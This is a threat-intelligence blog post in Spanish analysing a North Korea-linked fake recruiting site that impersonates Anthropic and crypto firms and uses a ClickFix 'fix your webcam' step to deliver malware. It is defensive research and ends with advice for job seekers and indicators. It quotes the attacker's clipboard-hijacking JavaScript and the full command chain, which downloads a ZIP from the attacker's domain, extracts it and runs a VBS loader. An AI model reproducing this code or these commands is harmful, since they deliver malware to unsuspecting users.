Incidentes Asociados
Dentro de la plataforma de trabajo falsa de la RPDC dirigida al talento de inteligencia artificial de EE. UU. -------------------------------------------------------- Esta semana comenzamos a rastrear una nueva variante de la operación Contagious Interview vinculada a la RPDC, una campaña ilícita de plataforma de trabajo diseñada para realizar ingeniería social y comprometer a personas que buscan trabajo en una variedad de roles, incluidos desarrolladores de software, investigadores de inteligencia artificial, profesionales de criptomonedas y otros solicitantes de empleo técnicos y no técnicos, mientras imitan a las marcas líderes en estas áreas. A diferencia de los programas de trabajadores de TI de la RPDC ampliamente reportados que se hacen pasar por empleados para infiltrarse en las empresas, Contagious Interview se enfoca en comprometer a las personas reales que buscan trabajo. Esta última iteración se destaca por su nivel notablemente más alto de pulido, señales de legitimidad y completitud técnica. El descubrimiento se produjo gracias a nuestro proceso de escaneo continuo basado en YARA, que ya ha descubierto numerosos señuelos relacionados con la RPDC este año. Lo que inicialmente parecía una página de phishing desechable resultó ser algo mucho más elaborado: una plataforma de empleo completamente desarrollada, basada en React Next.js, con docenas de rutas, listas de empleo generadas dinámicamente y basadas en UUID, y un flujo de trabajo que imita la experiencia de usuario (UX) de los sistemas de contratación actuales. En este blog, desglosamos la mecánica y la intención de la falsa bolsa de trabajo alojada en lenvny[.]com, examinamos cómo encaja en el ecosistema de Contagious Interview y destacamos qué deben tener en cuenta los solicitantes de empleo a medida que los adversarios continúan mejorando sus habilidades. Esta es peligrosamente convincente y casi garantiza que atraerá nuevas víctimas. Antecedentes de Contagious Interview ---------------------------------- Si bien este blog no pretende ser una guía definitiva sobre las convenciones de nomenclatura ni las metodologías de agrupamiento de los actores de amenazas de la RPDC, es importante establecer el linaje operativo detrás de la actividad que se describe aquí. La campaña, comúnmente conocida como "Entrevista Contagiosa", representa una iniciativa de larga data vinculada a la RPDC que aprovecha la ingeniería social y la distribución de malware, dirigida principalmente a desarrolladores de software, profesionales del sector de las criptomonedas y solicitantes de empleo técnico. Si bien existen algunas coincidencias, esta campaña se distingue de otras estrategias de trabajadores de TI de la RPDC que se centran en infiltrar actores en empresas legítimas bajo identidades falsas. En cambio, "Entrevista Contagiosa" está diseñada para comprometer a las personas mediante procesos de reclutamiento simulados, ejercicios de codificación maliciosa y plataformas de contratación fraudulentas, utilizando el propio proceso de solicitud de empleo como arma. En concreto, la actividad examinada en este blog sigue este patrón: mensaje de LinkedIn → proceso de entrevista → grabar una respuesta en video → reparar su cámara web (ClickFix) → malware. En este flujo de trabajo, se atrae a los candidatos a oportunidades de trabajo falsas, se les guía para que graben respuestas en video y se les pide que "reparen" sus cámaras web con una herramienta auxiliar. Este paso, aparentemente inocuo, envía malware directamente al sistema del objetivo. En Validin, hemos monitoreado, rastreado e interrumpido continuamente a los operadores vinculados con la RPDC que intentan acceder a nuestra plataforma tras captar su atención gracias a nuestra investigación previa, en particular a aquellos que prueban técnicas de evasión mediante análisis de infraestructura. Esto incluye una investigación colaborativa publicada junto con Reuters y SentinelOne, que documenta campañas dirigidas a cientos de personas. Gracias a este trabajo, hemos desarrollado una profunda visibilidad de las herramientas, los flujos de trabajo y las firmas operativas de las que dependen estos actores. Nuestros métodos de detección continua basados en YARA, únicos en la industria, han sido fundamentales en este esfuerzo. Estos métodos están específicamente adaptados a los artefactos y patrones de comportamiento observados en la infraestructura APT de la RPDC. Combinado con la información de socios de confianza de la industria, este enfoque nos permite descubrir nuevas variantes de la actividad de Entrevista Contagiosa, a menudo en las primeras etapas de la configuración de la infraestructura, lo que proporciona una visión clara de su evolución con el tiempo. La actividad destacada aquí se alinea estrechamente con patrones previamente reportados, incluyendo la investigación de Sekoia sobre ClickFake y el análisis de Cisco Talos sobre Famous Chollima, lo que sitúa este caso en el contexto de las campañas de reclutamiento y malware vinculadas a la RPDC. Diseño de Señuelos ----------- Los señuelos de estilo Entrevista Contagiosa más comúnmente documentados ofrecen muy poca interactividad a los visitantes accidentales, generalmente un formulario de inicio de sesión simple, una puerta genérica "solo para invitados" o una página de error que solo funciona al acceder a través del flujo de trabajo diseñado por el atacante. Este caso difiere notablemente. En lugar de ocultar la funcionalidad, los operadores invirtieron en una página de destino pública completamente desarrollada, diseñada para imitar un producto SaaS refinado. En concreto, Lenvny afirma ser una "Herramienta de Entrevista Integrada con Inteligencia Artificial", un software de reclutamiento para equipos de contratación. Al visitar el dominio, los usuarios se encuentran con una plataforma de marketing completa. La estética está diseñada intencionalmente para reflejar cómo los operadores creen que será el ecosistema de herramientas de IA en 2025: una interfaz de usuario limpia y con muchos gradientes, una marca sintética y una narrativa de producto centrada en la mejora de la productividad en la contratación. Esto amplía el atractivo del señuelo y aumenta su credibilidad incluso antes de que el visitante intente postularse a un puesto de trabajo publicado. En general, la temática y el diseño de la aplicación ilícita Lenvny, en múltiples dominios, imitan la plataforma legítima de adquisición de talento Lever (https://www.lever.co/). Figura 1. Página de inicio del señuelo malicioso. La página presenta insignias de aspecto profesional (Líder en herramientas de IA), testimonios falsos y logotipos de reconocidas empresas tecnológicas. No son simplemente ornamentales. Figura 2. Prueba social mediante insignias, citas falsas y logotipos de empresas conocidas para dar credibilidad a la artimaña. Los actores amplían aún más esta imagen de credibilidad con un cuadro comparativo de características, posicionando su plataforma ficticia junto a empresas reales que desarrollan flujos de trabajo de IA o herramientas de productividad para la contratación. Al situarse en el contexto de productos legítimos, incitan al objetivo a asumir la paridad: si la plataforma parece comparable en teoría, también debe ser un competidor real en el mercado. Este patrón refleja una tendencia creciente en el diseño de señuelos de la RPDC: adoptar el lenguaje visual de las startups tecnológicas occidentales para reducir las sospechas y acelerar la disposición de la víctima a participar. 
Figura 3. Comparación del sitio web falso con sitios genuinos que intenta dar más credibilidad al señuelo. En resumen, el sitio web señuelo no está diseñado como un simple desencadenante del flujo de distribución de malware, sino como un embudo optimizado para la conversión, diseñado para desarrolladores objetivo, profesionales de IA y profesionales relacionados con la criptografía. Su integridad sugiere esfuerzos deliberados para impulsar la participación, aumentar el tiempo en la página y hacer que la presentación final del reclutamiento y los pasos de distribución de malware se perciban como una continuación natural de un proceso de contratación real, en lugar de una transición abrupta hacia el comportamiento sospechoso que esperamos de los actores de amenazas norcoreanos. ### Ofertas de empleo. Uno de los elementos más llamativos de este señuelo es el esfuerzo invertido en simular un ecosistema de contratación legítimo. En lugar de simplemente dirigir a las víctimas a un único formulario de solicitud fraudulento, los operadores crearon un "portal de empleo" multiempresa que muestra ofertas de empleo de organizaciones reconocidas en los sectores de la IA, las criptomonedas y la Web3, muchas de las cuales han sido suplantadas repetidamente en operaciones similares a las de Contagious Interview. Las llamadas a la acción se ubican de forma destacada en toda la página de inicio, guiando a los visitantes hacia las ofertas de empleo y dando la apariencia de una auténtica plataforma de búsqueda de talento. La página de destino anuncia colaboraciones con empresas como Anthropic, Yuga Labs, Anchorage Digital, 1kx, Gate, AppDupe, RealT, NYDIG y Digital Currency Group, cada una presentada con una imagen de marca real, breves descripciones de la empresa y enlaces para ver las vacantes. ![ Figura 4. ‘Encuentra el trabajo de tus sueños’ Supuestas ofertas de empleo de marcas reconocidas, algunas de las cuales han sido suplantadas repetidamente en señuelos de entrevistas contagiosas.](https://www.validin.com/images/inside_dprk_fake_job_platform/image5.png "Figura 4. Supuestas ofertas de empleo de 'Encuentra el trabajo de tus sueños' de marcas reconocidas, algunas de las cuales han sido suplantadas repetidamente en señuelos de entrevistas contagiosas." Figura 4. Supuestas ofertas de empleo de 'Encuentra el trabajo de tus sueños' de marcas reconocidas, algunas de las cuales han sido suplantadas repetidamente en señuelos de entrevistas contagiosas. Al hacer clic en estas ofertas, se revela otro nivel de detalle. Por ejemplo, la página de empleos de Anthropic incluye docenas de vacantes falsas que abarcan desarrollo de negocios, gestión de productos, investigación y finanzas. Los títulos de los puestos, las descripciones y los tipos de empleo (remoto, híbrido, tiempo completo) están formateados para parecerse a las ofertas de empleo legítimas de EE. UU. Se incluyen varios menús desplegables para reforzar la ilusión de un portal de empleo completamente operativo. Este diseño va más allá de la similitud cosmética; refleja una comprensión de cómo los candidatos altamente cualificados evalúan las oportunidades de empleo. Al ofrecer puestos realistas alineados con la demanda actual del mercado laboral, la seguridad de la IA, las herramientas de Claude, la infraestructura criptográfica y el desarrollo empresarial, los actores posicionan la plataforma como un siguiente paso plausible para desarrolladores, investigadores e ingenieros que buscan puestos competitivos en sectores tecnológicos de rápido crecimiento. 
Figura 5. Listados de solicitudes de empleo para Anthropic que anuncian una variedad de puestos de trabajo. Tenga en cuenta que los menús desplegables eran parcialmente funcionales. ### Completar la solicitud El flujo de solicitud comienza con un formulario estandarizado replicado en todos los puestos listados. Cada empleo, independientemente de la antigüedad o especialización, presenta el mismo conjunto de campos obligatorios: nombre completo, correo electrónico, número de teléfono, empleador actual, ubicación y URL de LinkedIn. Estos datos son fundamentales para los esfuerzos de perfilación de identidad de la RPDC y son coherentes con los objetivos de información observados tanto en la Entrevista Contagiosa como en las campañas más amplias de la RPDC. 
Figura 6. Formulario de ejemplo, que era el mismo para todas las páginas. Además de los campos básicos, los atacantes incorporan un mecanismo de carga de currículums engañosamente pulido. La página anuncia una función de "autocompletado con IA" que supuestamente analiza archivos PDF o DOCX para extraer datos estructurados. Si bien el analizador en sí parece no funcionar, el señuelo incita eficazmente a las víctimas a subir currículums reales. Esto permite a los operadores crear expedientes precisos y con gran cantidad de objetivos, incluso si el paso del malware falla, e incluso usarlos potencialmente para generar currículums. Figura 7. Solicitud de datos clave de contacto y currículum. A continuación, la página solicita a los solicitantes enlaces adicionales a redes sociales y de identidad de desarrollador, como GitHub, LinkedIn y URL de portafolio. Esto se alinea estrechamente con la segmentación de personas dirigida a ingenieros, investigadores de IA y desarrolladores de criptografía, grupos con presencia técnica activa en línea. Estos enlaces ofrecen a los atacantes visibilidad sobre conjuntos de habilidades, repositorios de código y afiliaciones a empleadores, lo que puede influir en las decisiones de segmentación posteriores. Figura 8. Enlaces a redes sociales y "introducción en video": este es el punto en el que se entrega el señuelo de ClickFix, pero solo si se proporcionó un código de invitación válido al visitar el sitio web por primera vez. El último paso del proceso de solicitud es el requisito de la "Introducción en video", que solicita a los solicitantes grabar un video de uno a dos minutos explicando su interés en el puesto. Este es el punto de activación de la clásica técnica de ClickFix, asociada con el conocido manual de ataque de la Entrevista Contagiosa. Figura 9. El paso final: información adicional opcional e "Información sobre igualdad de oportunidades de empleo". Figura 9. El paso final: información adicional opcional e "Información sobre igualdad de oportunidades de empleo". Al acceder con un código de invitación válido, al hacer clic en "Grabar video", se inicia el intento de entrega del proceso de corrección de la codificación de video maliciosa. Este es el puente de ingeniería social entre una solicitud de empleo aparentemente inofensiva y la instalación de malware. Figura 10. Al intentar grabar su respuesta, aparecerá un cuadro de diálogo de error con el mensaje de corrección de clics. Al integrar la etapa de entrega maliciosa al final de un flujo de solicitud largo, pulido y aparentemente legítimo, los operadores probablemente aumentan las probabilidades de que un objetivo logre su objetivo. El proceso refleja fielmente las prácticas de contratación modernas, especialmente en organizaciones remotas que priorizan la IA y la criptografía, lo que permite al adversario introducir la etapa de malware en lo que parece ser una experiencia normal para el candidato. Desde una perspectiva profesional, esto marca una notable maduración del patrón de la Entrevista Contagiosa. En lugar de empujar a las víctimas directamente a una entrevista o prueba de codificación, los operadores construyen un proceso completo de adquisición de talentos que permite a los solicitantes elegir roles que reconocen y en los que creen. Esta autoselección refuerza la confianza, sostiene el compromiso y reduce las sospechas en múltiples pasos. Para cuando el flujo de trabajo pasa a la etapa de "introducción en video", momento en el que se implementa la carga útil de ClickFix, la víctima ya ha invertido tiempo, compartido información personal y generado confianza en la autenticidad del proceso. Análisis de la cadena de ejecución maliciosa ---------------------------------------- Una vez que la víctima copia las "instrucciones" de la página señuelo, el script de secuestro del portapapeles reemplaza silenciosamente el contenido del portapapeles con un comando completamente armado. Al pegarlo en una terminal, el comando inicia una secuencia de infección de varias etapas diseñada para integrarse en un flujo de trabajo legítimo de actualización de software. Esta es la carga útil exacta que la página inyecta en el portapapeles en Windows: echo curl -L "https[:]//download[.]microsoft[.]com/download/graphics-driver-update.exe" -o driver-update.exe && driver-update.exe /silent & curl -k -o "%TEMP%\fixed.zip" "https[:]//app[.]lenvny[.]com/cam-v-abc123.fix" && powershell -Command "Expand-Archive -Force -Path '%TEMP%\fixed.zip' -DestinationPath '%TEMP%\fixed'" && wscript "%TEMP%\fixed\update.vbs" #### Etapa 1: Descargador falso de "Actualización del controlador de Microsoft" El señuelo hace esto agregando un detector de eventos para acciones de "copia", verificando si hay algún contenido seleccionado en la página y luego modificando el contenido de la Datos del portapapeles para copiar el comando malicioso. El comando malicioso tiene como prefijo un comando "echo" que simplemente imprime el siguiente comando en pantalla, pero no lo ejecuta: curl -L "https[:]//download[.]microsoft[.]com/download/graphics-driver-update.exe" -o driver-update.exe. El comando comienza con una carga útil con un nombre convincente y alojada de forma plausible: una "actualización del controlador gráfico" supuestamente descargada del dominio de Microsoft. && driver-update.exe /silent. El doble ampersand significa "ejecutar solo si el comando anterior se ejecutó correctamente". Dado que echo se ejecutará correctamente, pero no descargará un archivo, el ejecutable no existirá y esto devolverá un error (desvío de archivos). #### Etapa 2: Recuperar el archivo secundario de la infraestructura del atacante & curl -k -o "%TEMP%\fixed.zip" "https[:]//app[.]lenvny[.]com/cam-v-abc123.fix" El símbolo & ejecutará el siguiente comando, independientemente de si el comando anterior se ejecutó correctamente. A continuación, el comando recupera un archivo ZIP de segunda etapa de un dominio controlado por el atacante (app[.]lenvny[.]com). El indicador -k deshabilita la validación del certificado, lo que permite que la descarga se realice correctamente incluso si el dominio presenta un certificado no válido o autofirmado. #### Etapa 3: Extraer scripts integrados powershell -Command "Expand-Archive -Force -Path '%TEMP%\fixed.zip' -DestinationPath '%TEMP%\fixed'" PowerShell expande el archivo malicioso en una carpeta temporal. El uso de PowerShell evita la generación de una interfaz de usuario adicional visible para el usuario y es una opción común en los TTP de la RPDC para preparar componentes. #### Etapa 4: Ejecutar el cargador VBS wscript "%TEMP%\fixed\update.vbs" El paso final transfiere la ejecución a un cargador VBScript, a menudo utilizado para persistencia, comprobaciones del entorno o la descarga de cargas útiles terciarias. El uso de wscript.exe de nuevo ayuda al operador a integrarse con los componentes nativos de Windows. ### Cómo funciona el secuestro del portapapeles Para garantizar la ejecución encubierta de la cadena de malware, la página señuelo integra un detector de eventos de copia. Cada vez que una víctima copia algo de la página, ya sean instrucciones de trabajo, un desafío de codificación o pasos de solución de problemas aparentemente inofensivos, el script primero comprueba si hay algún texto seleccionado. De ser así, reemplaza el contenido del portapapeles del usuario con la secuencia de comandos predefinida del atacante. En la práctica, la página realiza esto registrando un controlador personalizado para el evento "copia" del navegador. Cuando se activa, el controlador intercambia la selección legítima de la víctima con una carga útil maliciosa específica de la plataforma: JavaScript malicioso let e = e =>; { if (! window.getSelection()) return; let t = "win" === M ? 'echo curl -L "https[:]//download[.]microsoft[.]com/download/graphics-driver-update.exe" -o driver-update.exe && driver-update.exe /silent & ' + H.windows : "echo 'curl -L \"https[:]//drivers[.]softpedia[.]com/driver-update.pkg\" -o driver-update.pkg && sudo installer -pkg driver-update.pkg -target /' & " + H.mac; e.clipboardData && (e.clipboardData.setData("text/plain", t), e.preventDefault()) } ; return document.addEventListener("copy", e), () =>; { document.removeEventListener("copy", e) } Al manipular el portapapeles al momento de copiar, los operadores evitan la parte más difícil de su problema de ingeniería social: convencer al objetivo de ejecutar un comando obviamente sospechoso. En su lugar, una sola acción rutinaria, copiar texto de una tarea de trabajo, carga subrepticiamente los comandos maliciosos. Incluso usuarios o analistas preocupados por la seguridad que validan el sitio pueden activar el evento sin saberlo, y si posteriormente lo pegan en PowerShell o una terminal, la carga útil completa se ejecuta sin más indicaciones. En lugar de dirigir inmediatamente a los candidatos hacia un script o ejecutable malicioso, los operadores ocultan la carga útil dentro de un flujo de trabajo similar a los procesos comunes de incorporación o proyectos de prueba para roles de IA, criptografía y software. Al cargar por adelantado el ataque en un evento del portapapeles y envolver la cadena en un proceso de resolución de problemas creíble, los operadores de la DPRK: - Reducen la fricción y hacen que la ejecución accidental sea mucho más probable - Aprovechan los hábitos del usuario ("copiar/pegar desde las instrucciones de la tarea") - Aumentan el sigilo aprovechando las utilidades nativas de Windows - Crean una cadena de carga de varias etapas que es más difícil de clasificar a simple vista El resultado es una ruta de infección más madura y pulida operativamente, que aprovecha la confianza del usuario, la interactividad del navegador y el flujo natural de un proceso de contratación de trabajo remoto. Beneficio de apuntar a talento de IA y criptografía de alto valor ---------------------------------------------------- La elección de hacerse pasar por empleadores como Anthropic, Anchorage Digital, Yuga Labs y otras empresas tecnológicas de alto crecimiento no es arbitraria: refleja las prioridades de recopilación bien documentadas de la DPRK en torno a la investigación de inteligencia artificial, la infraestructura de criptomonedas y el talento de desarrollo de software de alto valor. Las ofertas de trabajo falsas funcionan no solo como un señuelo, sino también como un mecanismo de filtrado de perfiles, atrayendo precisamente a individuos cuyas habilidades, acceso a la red y entornos de trabajo tienen valor estratégico para los operadores de la RPDC. Desde la perspectiva de la selección de objetivos, los ingenieros de IA y criptografía ofrecen varias ventajas: 1. Relevancia directa para los programas estratégicos de la RPDC. El interés de Corea del Norte en la IA está vinculado tanto a aplicaciones militares (p. ej., sistemas autónomos, modelado, automatización de la cadena de herramientas de ciberoperaciones) como a objetivos económicos (p. ej., evasión de sanciones mediante fraude asistido por IA, manipulación de criptomonedas o generación de identidades sintéticas). Seleccionar a ingenieros que trabajan con LLM, implementación de modelos o entornos de investigación de IA proporciona acceso a herramientas y experiencia que el régimen tiene dificultades para desarrollar internamente. 1. Utilidad financiera inmediata a través del acceso a criptomonedas. Los profesionales en plataformas de intercambio de criptomonedas, plataformas DeFi y proveedores de custodia suelen operar en entornos que gestionan activos de alto valor. Sus dispositivos, credenciales, repositorios de fuentes y sistemas internos son puntos de apoyo frecuentes en operaciones de la RPDC con fines financieros, como TraderTraitor y sus derivados. Al hacerse pasar por importantes marcas de activos digitales, los actores se posicionan para llegar a personas con acceso privilegiado a billeteras operativas, canales de CI/CD o paneles internos. 1. Compatibilidad con ingeniería social. Los roles de IA y criptografía se prestan a flujos de trabajo de contratación que facilitan el trabajo remoto. Las tareas de preselección, las entrevistas de video asincrónicas y las evaluaciones técnicas para llevar a casa son estándar y no suelen ser sospechosas. Esto facilita que la cadena de distribución de malware "graba una respuesta en video" → "arregla tu cámara web con ClickFix" → se integre a la perfección con el comportamiento habitual del sector. 1. Alta probabilidad de privilegios avanzados en estaciones de trabajo. Los objetivos en estos campos suelen ejecutar entornos de desarrollo con acceso elevado, administradores de paquetes, cargas de trabajo dockerizadas, herramientas personalizadas o compilaciones experimentales, todo lo cual aumenta la tasa de éxito de la ejecución inicial de la carga útil y la persistencia posterior. 1. Acceso a investigación y código propietarios. Para los laboratorios de IA, esto puede incluir ponderaciones de modelos, canales de ajuste, infraestructura de inferencia o funciones inéditas. Para las empresas de criptomonedas, puede incluir sistemas de gestión de claves, auditorías de contratos inteligentes o herramientas de monitorización interna. Cualquiera de estas herramientas puede contribuir directamente a los objetivos de la RPDC, ya sea operativos o financieros. Consejos para quienes buscan empleo ---------------------- Quienes buscan empleo, especialmente quienes buscan puestos técnicos, deben abordar cualquier oportunidad desconocida con un buen nivel de escepticismo. Verifique siempre que la página de empleos y el flujo de solicitud de una empresa provengan de un dominio oficial de primera parte, y si un reclutador le dirige a un dominio independiente que no conoce, trátelo con precaución. Evite subir su currículum, portafolio o documentos personales a plataformas que no pueda validar por completo. Las empresas legítimas rara vez, o nunca, alojan portales de entrevistas o pruebas de codificación en sitios fuera del dominio, y no le presionarán para que utilice repositorios de proyectos no verificados como parte de una evaluación. Si le piden que clone un repositorio o ejecute código como parte de una entrevista técnica, revíselo detenidamente de antemano y siempre ejecute scripts desconocidos dentro de una máquina virtual, un entorno desechable o un entorno de pruebas. Unos minutos extra de escrutinio pueden marcar la diferencia entre una transición profesional exitosa y una estación de trabajo comprometida. Indicadores ---------- Dominios e IP relacionados lenvny[.]com adviserflux[.]com ensureeval[.]com carrerlilla[.]com 69.62.86.78 72.61.9.45